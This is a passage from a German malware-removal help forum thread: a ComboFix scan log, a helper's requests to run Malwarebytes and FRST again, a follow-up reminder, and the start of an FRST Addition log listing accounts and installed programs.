(x86)\Sony\Sony PC Companion\PCCService.exe [x] R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x] S0 AVGIDSHA;AVGIDSHA;c:\windows\system32\DRIVERS\avgidsha.sys;c:\windows\SYSNATIVE\DRIVERS\avgidsha.sys [x] S0 Avgloga;AVG Logging Driver;c:\windows\system32\DRIVERS\avgloga.sys;c:\windows\SYSNATIVE\DRIVERS\avgloga.sys [x] S0 Avgmfx64;AVG Mini-Filter Resident Anti-Virus Shield;c:\windows\system32\DRIVERS\avgmfx64.sys;c:\windows\SYSNATIVE\DRIVERS\avgmfx64.sys [x] S0 Avgrkx64;AVG Anti-Rootkit Driver;c:\windows\system32\DRIVERS\avgrkx64.sys;c:\windows\SYSNATIVE\DRIVERS\avgrkx64.sys [x] S1 Avgdiska;AVG Disk Driver;c:\windows\system32\DRIVERS\avgdiska.sys;c:\windows\SYSNATIVE\DRIVERS\avgdiska.sys [x] S1 Avgfwfd;AVG network filter service;c:\windows\system32\DRIVERS\avgfwd6a.sys;c:\windows\SYSNATIVE\DRIVERS\avgfwd6a.sys [x] S1 AVGIDSDriver;AVGIDSDriver;c:\windows\system32\DRIVERS\avgidsdrivera.sys;c:\windows\SYSNATIVE\DRIVERS\avgidsdrivera.sys [x] S1 Avgldx64;AVG AVI Loader Driver;c:\windows\system32\DRIVERS\avgldx64.sys;c:\windows\SYSNATIVE\DRIVERS\avgldx64.sys [x] S1 Avgtdia;AVG TDI Driver;c:\windows\system32\DRIVERS\avgtdia.sys;c:\windows\SYSNATIVE\DRIVERS\avgtdia.sys [x] S1 cbfs3;cbfs3;c:\windows\system32\drivers\cbfs3.sys;c:\windows\SYSNATIVE\drivers\cbfs3.sys [x] S2 avgfws;AVG Firewall;c:\program files (x86)\AVG\AVG2015\avgfws.exe;c:\program files (x86)\AVG\AVG2015\avgfws.exe [x] S2 AVGIDSAgent;AVGIDSAgent;c:\program files (x86)\AVG\AVG2015\avgidsagent.exe;c:\program files (x86)\AVG\AVG2015\avgidsagent.exe [x] S2 avgwd;AVG WatchDog;c:\program files (x86)\AVG\AVG2015\avgwdsvc.exe;c:\program files (x86)\AVG\AVG2015\avgwdsvc.exe [x] S2 CGVPNCliService;CyberGhost 5 Client Service;c:\program files\CyberGhost 5\Service.exe;c:\program files\CyberGhost 5\Service.exe [x] S2 NIHardwareService;NIHardwareService;c:\program files\Common Files\Native Instruments\Hardware\NIHardwareService.exe;c:\program 
files\Common Files\Native Instruments\Hardware\NIHardwareService.exe [x] S2 NvStreamSvc;NVIDIA Streamer Service;c:\program files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe;c:\program files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [x] S2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service;c:\program files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe;c:\program files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe [x] S2 WtuSystemSupport;WtuSystemSupport;c:\program files (x86)\AVG Web TuneUp\WtuSystemSupport.exe;c:\program files (x86)\AVG Web TuneUp\WtuSystemSupport.exe [x] S2 zuroluxy;Background Type;c:\program files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs;c:\program files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs [x] S3 Disc Soft Lite Bus Service;Disc Soft Lite Bus Service;c:\program files\DAEMON Tools Lite\DiscSoftBusService.exe;c:\program files\DAEMON Tools Lite\DiscSoftBusService.exe [x] S3 dtlitescsibus;DAEMON Tools Lite Virtual SCSI Bus;c:\windows\system32\DRIVERS\dtlitescsibus.sys;c:\windows\SYSNATIVE\DRIVERS\dtlitescsibus.sys [x] S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys;c:\windows\SYSNATIVE\drivers\mbam.sys [x] S3 nvvad_WaveExtensible;NVIDIA Virtual Audio Device (Wave Extensible) (WDM);c:\windows\system32\drivers\nvvad64v.sys;c:\windows\SYSNATIVE\drivers\nvvad64v.sys [x] . . [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}] 2015-09-16 18:24 997704 ----a-w- c:\program files (x86)\Google\Chrome\Application\45.0.2454.93\Installer\chrmstp.exe . Inhalt des "geplante Tasks" Ordners . 2015-09-03 c:\windows\Tasks\Adobe Flash Player PPAPI Notifier.job - c:\windows\SysWOW64\Macromed\Flash\FlashUtil32_18_0_0_232_pepper.exe [2015-08-13 00:23] . 2015-09-03 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job - c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-02-16 23:51] . 
2015-09-03 c:\windows\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0.job - c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-02-16 23:51] . 2015-09-21 c:\windows\Tasks\GoogleUpdateTaskMachineCore1d0925912504720.job - c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-02-16 23:51] . 2015-09-03 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job - c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-02-16 23:51] . 2015-09-03 c:\windows\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90.job - c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-02-16 23:51] . 2015-09-03 c:\windows\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80.job - c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-02-16 23:51] . 2015-09-21 c:\windows\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70.job - c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-02-16 23:51] . . --------- X64 Entries ----------- . . [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\0WualaOverlayIcon1] @="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41}" [HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41}] 2012-05-02 12:10 1721856 ----a-w- c:\program files (x86)\Wuala OverlayIcons\OverlayIcon.dll . [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\0WualaOverlayIcon2] @="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42}" [HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42}] 2012-05-02 12:10 1721856 ----a-w- c:\program files (x86)\Wuala OverlayIcons\OverlayIcon.dll . [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\0WualaOverlayIcon3] @="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43}" [HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43}] 2012-05-02 12:10 1721856 ----a-w- c:\program files (x86)\Wuala OverlayIcons\OverlayIcon.dll . 
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\0WualaOverlayIcon4] @="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}" [HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}] 2012-05-02 12:10 1721856 ----a-w- c:\program files (x86)\Wuala OverlayIcons\OverlayIcon.dll . [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1EldosIconOverlay] @="{56D36CD8-63C4-425D-B03D-CC30C1711EA4}" [HKEY_CLASSES_ROOT\CLSID\{56D36CD8-63C4-425D-B03D-CC30C1711EA4}] 2012-04-09 15:27 190480 ----a-w- c:\windows\System32\CbFsMntNtf3.dll . [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\EldosIconOverlay] @="{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}" [HKEY_CLASSES_ROOT\CLSID\{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}] 2012-04-09 15:27 190480 ----a-w- c:\windows\System32\CbFsMntNtf3.dll . [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "Nvtmru"="c:\program files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe" [2013-10-18 1028384] . ------- Zusätzlicher Suchlauf ------- . uLocal Page = c:\windows\system32\blank.htm uStart Page = hxxp://www.google.com mStart Page = about:blank mLocal Page = c:\windows\SysWOW64\blank.htm mDefault_Page_URL = hxxp://www.google.com uSearchAssistant = hxxp://www.google.com IE: Free YouTube Download - c:\program files (x86)\Common Files\DVDVideoSoft\plugins\freeytvdownloader.htm IE: {{07BA1DA9-F501-4796-8728-74D1B91A6CD5} - c:\program files (x86)\PokerStars.EU\PokerStarsUpdate.exe Trusted Zone: localhost Trusted Zone: webcompanion.com TCP: DhcpNameServer = 192.168.2.1 FF - ProfilePath - c:\users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\ FF - prefs.js: browser.startup.homepage - hxxps://www.malwarebytes.org/restorebrowser/ . - - - - Entfernte verwaiste Registrierungseinträge - - - - . 
Toolbar-Locked - (no file) Wow6432Node-HKCU-Run-Web Companion - c:\program files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe Wow6432Node-HKU-Default-Run-Bitdefender-Geldbörse-Agent - c:\program files\Bitdefender\Bitdefender\pmbxag.exe Wow6432Node-HKU-Default-Run-Bitdefender-Geldbörse - c:\program files\Bitdefender\Bitdefender\pwdmanui.exe Wow6432Node-HKU-Default-Run-Bitdefender-Geldbörse-Anwendungs-Agent - c:\program files\Bitdefender\Bitdefender\antispam32\bdapppassmgr.exe c:\users\Kenny G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopnotes.lnk - (no file) Toolbar-Locked - (no file) AddRemove-Native Instruments Audio 2 DJ Driver - c:\programdata\{033B4844-E9C3-45D2-88D9-34DDF3F91100}\Audio 2 DJ Driver Setup PC.exe AddRemove-Native Instruments Audio 4 DJ Driver - c:\programdata\{4682E4CB-7209-4099-8AA1-580ABCCCE731}\Audio 4 DJ Driver Setup PC.exe AddRemove-Native Instruments Audio 8 DJ Driver - c:\programdata\{D2030082-F62A-402A-9456-8009276FD896}\Audio 8 DJ Driver Setup PC.exe AddRemove-Native Instruments Controller Editor - c:\programdata\{07D05344-6233-4934-88BF-C7E4EEFF9D28}\Controller Editor Setup PC.exe AddRemove-Native Instruments Service Center - c:\programdata\{90D8CE90-3E6B-4034-A281-BC9F19B60A5B}\Service Center Setup PC.exe AddRemove-Native Instruments Traktor - c:\programdata\{47803536-1938-4D3F-86D6-F4876B645542}\Traktor Setup PC.exe AddRemove-Native Instruments Traktor 2 - c:\programdata\{9E7BD413-9B42-4EEC-96F4-6FF3CF9791A2}\Traktor 2 Setup PC.exe AddRemove-Native Instruments Traktor Audio 2 Driver - c:\programdata\{0CC85DFF-E70A-4AB0-968A-F1F98F4D0C67}\Traktor Audio 2 Driver Setup PC.exe AddRemove-Native Instruments Traktor Audio 2 MK2 Driver - c:\programdata\{B3478C15-588A-4968-AD66-76AA98803A28}\Traktor Audio 2 MK2 Driver Setup PC.exe AddRemove-Native Instruments Traktor Audio 6 Driver - c:\programdata\{662EAAEC-9E9A-4C69-A658-884E51E909BB}\Traktor Audio 6 Driver Setup PC.exe AddRemove-Native Instruments 
Traktor Kontrol D2 Driver - c:\programdata\{8D4C602D-E844-4297-BB00-303F1AFBDCBE}\Traktor Kontrol D2 Driver Setup PC.exe AddRemove-Native Instruments Traktor Kontrol F1 Driver - c:\programdata\{219191E6-6846-4329-889D-7956C487D9A6}\Traktor Kontrol F1 Driver Setup PC.exe AddRemove-Native Instruments Traktor Kontrol S2 Driver - c:\programdata\{9F570B21-E27A-40BE-A508-292899A7D042}\Traktor Kontrol S2 Driver Setup PC.exe AddRemove-Native Instruments Traktor Kontrol S2 MK2 Driver - c:\programdata\{AF79C86B-2321-4D47-A168-2A24BA2B6A73}\Traktor Kontrol S2 MK2 Driver Setup PC.exe AddRemove-Native Instruments Traktor Kontrol S4 Driver - c:\programdata\{B7C85E99-2AC6-455D-B4D1-752A56403757}\Traktor Kontrol S4 Driver Setup PC.exe AddRemove-Native Instruments Traktor Kontrol S4 MK2 Driver - c:\programdata\{57B31BE2-3175-4425-9722-D2AC5F68C7BD}\Traktor Kontrol S4 MK2 Driver Setup PC.exe AddRemove-Native Instruments Traktor Kontrol S8 Driver - c:\programdata\{AD2628D6-C822-4033-AC55-33D833EF2EC9}\Traktor Kontrol S8 Driver Setup PC.exe AddRemove-Native Instruments Traktor Kontrol X1 Driver - c:\programdata\{018F1C44-00D1-417B-B251-92A5634F74AE}\Traktor Kontrol X1 Driver Setup PC.exe AddRemove-Native Instruments Traktor Kontrol X1 MK2 Driver - c:\programdata\{9B09061B-0A4F-42DA-9987-7D3F452DCB09}\Traktor Kontrol X1 MK2 Driver Setup PC.exe AddRemove-Native Instruments Traktor Kontrol Z1 Driver - c:\programdata\{9597097D-B8DC-4754-AF2D-CB61CCFC861A}\Traktor Kontrol Z1 Driver Setup PC.exe AddRemove-Native Instruments Traktor Kontrol Z2 Driver - c:\programdata\{EB21323D-3F46-4EF0-B849-B096B7705C69}\Traktor Kontrol Z2 Driver Setup PC.exe AddRemove-{013CCA52-DA56-4133-AC2B-1988A9568C30} - c:\programdata\{4682E4CB-7209-4099-8AA1-580ABCCCE731}\Audio 4 DJ Driver Setup PC.exe AddRemove-{0886900B-B2F3-452C-B580-60F1253F7F80} - c:\programdata\{07D05344-6233-4934-88BF-C7E4EEFF9D28}\Controller Editor Setup PC.exe AddRemove-{0B8565BA-BAD5-4732-B122-5FD78EFC50A9} - 
c:\programdata\{90D8CE90-3E6B-4034-A281-BC9F19B60A5B}\Service Center Setup PC.exe AddRemove-{1FF959F4-8993-4c52-A397-0CB982C91954} - c:\programdata\{AD2628D6-C822-4033-AC55-33D833EF2EC9}\Traktor Kontrol S8 Driver Setup PC.exe AddRemove-{23A66953-369C-4d22-A189-C6E403D4A19F} - c:\programdata\{033B4844-E9C3-45D2-88D9-34DDF3F91100}\Audio 2 DJ Driver Setup PC.exe AddRemove-{24873332-B98B-4235-ABBA-CCDEACC62BB9} - c:\programdata\{662EAAEC-9E9A-4C69-A658-884E51E909BB}\Traktor Audio 6 Driver Setup PC.exe AddRemove-{28F19F09-F228-49cb-8B90-F97DA7180DD4} - c:\programdata\{B7C85E99-2AC6-455D-B4D1-752A56403757}\Traktor Kontrol S4 Driver Setup PC.exe AddRemove-{2AAC4085-DCBF-417B-AEBD-182197839240} - c:\programdata\{47803536-1938-4D3F-86D6-F4876B645542}\Traktor Setup PC.exe AddRemove-{3054FEFA-4748-4cf0-8C3C-8DB887DE379F} - c:\programdata\{0CC85DFF-E70A-4AB0-968A-F1F98F4D0C67}\Traktor Audio 2 Driver Setup PC.exe AddRemove-{3D8003CE-E3CD-49b7-A59E-9C21546AF95E} - c:\programdata\{9F570B21-E27A-40BE-A508-292899A7D042}\Traktor Kontrol S2 Driver Setup PC.exe AddRemove-{47047AA6-C62D-4334-B9CB-84E0630269EC} - c:\programdata\{AF79C86B-2321-4D47-A168-2A24BA2B6A73}\Traktor Kontrol S2 MK2 Driver Setup PC.exe AddRemove-{470BB39A-7231-4077-AD3D-86067AD04604} - c:\programdata\{D2030082-F62A-402A-9456-8009276FD896}\Audio 8 DJ Driver Setup PC.exe AddRemove-{612601db-4776-4127-bab5-d84b8644e530} - c:\programdata\{018F1C44-00D1-417B-B251-92A5634F74AE}\Traktor Kontrol X1 Driver Setup PC.exe AddRemove-{7ADD3C28-6348-4940-8C10-9ED751F1A543} - c:\programdata\{219191E6-6846-4329-889D-7956C487D9A6}\Traktor Kontrol F1 Driver Setup PC.exe AddRemove-{7B8BA774-C154-4DEE-A92D-D0E7236BB152} - c:\programdata\{B3478C15-588A-4968-AD66-76AA98803A28}\Traktor Audio 2 MK2 Driver Setup PC.exe AddRemove-{938FA945-D818-48A1-BE66-6921B0D649CF} - c:\programdata\{EB21323D-3F46-4EF0-B849-B096B7705C69}\Traktor Kontrol Z2 Driver Setup PC.exe AddRemove-{99640eec-4d74-4df5-95f4-719dc27de6a8} - c:\program files 
(x86)\Lavasoft\Web Companion\Application\WebCompanionInstaller.exe AddRemove-{A8EC0CC0-AD8D-4244-B080-424EDF7A7634} - c:\programdata\{9E7BD413-9B42-4EEC-96F4-6FF3CF9791A2}\Traktor 2 Setup PC.exe AddRemove-{B861B550-23FD-4E56-9D7F-4E81AFE2B639} - c:\programdata\{8D4C602D-E844-4297-BB00-303F1AFBDCBE}\Traktor Kontrol D2 Driver Setup PC.exe AddRemove-{C39B8892-BB8B-4B0C-AFA6-7B6EE897B286} - c:\programdata\{57B31BE2-3175-4425-9722-D2AC5F68C7BD}\Traktor Kontrol S4 MK2 Driver Setup PC.exe AddRemove-{CD79F608-0EEC-4e8b-A8A3-98A9CB723702} - c:\programdata\{9597097D-B8DC-4754-AF2D-CB61CCFC861A}\Traktor Kontrol Z1 Driver Setup PC.exe AddRemove-{D18B6F23-0B79-448C-9739-29A03843D660} - c:\programdata\{9B09061B-0A4F-42DA-9987-7D3F452DCB09}\Traktor Kontrol X1 MK2 Driver Setup PC.exe . . . [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\zuroluxy] "ImagePath"="c:\program files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs" . --------------------- Gesperrte Registrierungsschluessel --------------------- . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}] @Denied: (A 2) (Everyone) @="FlashBroker" "LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_18_0_0_232_ActiveX.exe,-101" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation] "Enabled"=dword:00000001 . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32] @="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_18_0_0_232_ActiveX.exe" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib] @="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}] @Denied: (A 2) (Everyone) @="IFlashBroker6" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32] @="{00020424-0000-0000-C000-000000000046}" . 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib] @="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}" "Version"="1.0" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}] @Denied: (A 2) (Everyone) @="FlashBroker" "LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_18_0_0_232_ActiveX.exe,-101" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation] "Enabled"=dword:00000001 . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32] @="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_18_0_0_232_ActiveX.exe" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib] @="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}] @Denied: (A 2) (Everyone) @="Shockwave Flash Object" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32] @="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_18_0_0_232.ocx" "ThreadingModel"="Apartment" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus] @="0" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID] @="ShockwaveFlash.ShockwaveFlash.18" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32] @="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_18_0_0_232.ocx, 1" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib] @="{D27CDB6B-AE6D-11cf-96B8-444553540000}" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version] @="1.0" . 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID] @="ShockwaveFlash.ShockwaveFlash" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}] @Denied: (A 2) (Everyone) @="Macromedia Flash Factory Object" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32] @="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_18_0_0_232.ocx" "ThreadingModel"="Apartment" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID] @="FlashFactory.FlashFactory.1" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32] @="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_18_0_0_232.ocx, 1" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib] @="{D27CDB6B-AE6D-11cf-96B8-444553540000}" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version] @="1.0" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID] @="FlashFactory.FlashFactory" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}] @Denied: (A 2) (Everyone) @="IFlashBroker6" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32] @="{00020424-0000-0000-C000-000000000046}" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib] @="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}" "Version"="1.0" . [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security] @Denied: (Full) (Everyone) . ------------------------ Weitere laufende Prozesse ------------------------ . 
c:\program files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe c:\program files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe c:\program files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe c:\windows\SysWOW64\PnkBstrA.exe . ************************************************************************** . Zeit der Fertigstellung: 2015-09-21 18:38:38 - PC wurde neu gestartet ComboFix-quarantined-files.txt 2015-09-21 16:38 . Vor Suchlauf: 13 Verzeichnis(se), 73.854.971.904 Bytes frei Nach Suchlauf: 19 Verzeichnis(se), 75.190.906.880 Bytes frei . - - End Of File - - B840A83B98C11AB4375A0BE6C9BACBB0 A36C5E4F47E84449FF07ED3517B43A31 |
22.09.2015, 11:01 | #6 |
/// Malwareteam | Malware-gen, Adware-gen ...etc. Hello Zympop, thank you for your good cooperation so far. Until the cleanup is finished, please do not run any scans unprompted and/or install or uninstall programs. Please keep following the instructions until I clearly tell you that your PC is clean! Just because the symptoms have disappeared does not mean that the infection has been removed as well! Thank you! Step 1 Please start Malwarebytes Anti-Malware again
Step 2 Please start FRST again, tick the Addition checkbox and click Scan. So in your next reply, please post:
__________________ --> Malware-gen, Adware-gen ...etc. |
24.09.2015, 19:45 | #7 |
/// Malwareteam | Malware-gen, Adware-gen ...etc. Hello, do you still need help? If I do not receive a reply from you within the next 24 hours, I will remove your thread from my subscriptions and will then no longer be notified of new replies. The disappearance of the symptoms does not mean that your system is already clean.
__________________ Best regards, Rafael ~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~ |
26.09.2015, 11:57 | #8 |
| Malware-gen, Adware-gen ...etc. Hello Burning. Thank you very much for your help so far =) Addition Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:23-09-2015 durchgeführt von Kenny G (2015-09-23 05:00:52) Gestartet von C:\Users\Kenny G\Downloads Windows 7 Ultimate (X64) (2013-10-01 16:18:55) Start-Modus: Normal ========================================================== ==================== Konten: ============================= Administrator (S-1-5-21-682121585-3582832733-1082443493-500 - Administrator - Disabled) eLoot (S-1-5-21-682121585-3582832733-1082443493-1008 - Administrator - Enabled) => C:\Users\eLoot Gast (S-1-5-21-682121585-3582832733-1082443493-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-682121585-3582832733-1082443493-1002 - Limited - Enabled) Kenny G (S-1-5-21-682121585-3582832733-1082443493-1000 - Administrator - Enabled) => C:\Users\Kenny G Tabea Studium (S-1-5-21-682121585-3582832733-1082443493-1009 - Limited - Enabled) => C:\Users\Tabea Studium UpdatusUser (S-1-5-21-682121585-3582832733-1082443493-1007 - Limited - Enabled) => C:\Users\UpdatusUser ==================== Sicherheits-Center ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.) AV: AVG Internet Security 2015 (Enabled - Up to date) {4D41356F-32AD-7C42-C820-63775EE4F413} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: AVG Internet Security 2015 (Enabled - Up to date) {F620D48B-1497-73CC-F290-58052563BEAE} FW: AVG Internet Security 2015 (Enabled) {757AB44A-78C2-7D1A-E37F-CA42A037B368} ==================== Installierte Programme ====================== (Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.) 
888poker (HKLM-x32\...\888poker) (Version: - ) aborange Crypter - Deinstallation (HKLM-x32\...\aborange Crypter_is1) (Version: 3.10 - Mathias Gerlach [aborange.de]) Adobe Flash Player 18 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 18.0.0.232 - Adobe Systems Incorporated) Adobe Flash Player 18 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated) Adobe Flash Player 18 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated) Adobe Reader XI (11.0.12) - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AB0000000001}) (Version: 11.0.12 - Adobe Systems Incorporated) Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{2EF5D87E-B7BD-458F-8428-E4D0B8B4E65C}) (Version: 7.0.0.117 - Apple Inc.) Auslogics DiskDefrag (HKLM-x32\...\{DF6A13C0-77DF-41FE-BD05-6D5201EB0CE7}_is1) (Version: 4.4.2.0 - Auslogics Labs Pty Ltd) AVG 2015 (HKLM\...\AVG) (Version: 2015.0.6140 - AVG Technologies) AVG 2015 (Version: 15.0.4419 - AVG Technologies) Hidden AVG 2015 (Version: 15.0.6140 - AVG Technologies) Hidden AVG Web TuneUp (HKLM-x32\...\AVG Web TuneUp) (Version: 4.1.6.294 - AVG Technologies) Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment) Battlefield: Bad Company 2 (HKLM-x32\...\Steam App 24960) (Version: - DICE) Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.) CCleaner (HKLM\...\CCleaner) (Version: 4.06 - Piriform) CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.5.5571 - CDBurnerXP) Cliqz 